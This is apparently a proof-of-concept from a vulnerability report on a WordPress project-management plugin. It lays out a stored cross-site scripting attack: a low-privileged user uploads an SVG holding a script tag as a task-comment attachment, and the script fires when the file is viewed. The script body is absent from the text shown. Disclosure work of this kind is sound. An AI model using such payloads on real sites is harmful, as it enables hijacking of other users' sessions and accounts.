Create a SVG with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">

As any authenticated user, such as subscriber:
- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any tasks (create one if there aren't any)
- Focus on "Write a comment".
- Click on "Attach Files" and select the SVG created above
- Click on "Send".
- View the attached SVG by clicking on its URL (, which will trigger the XSS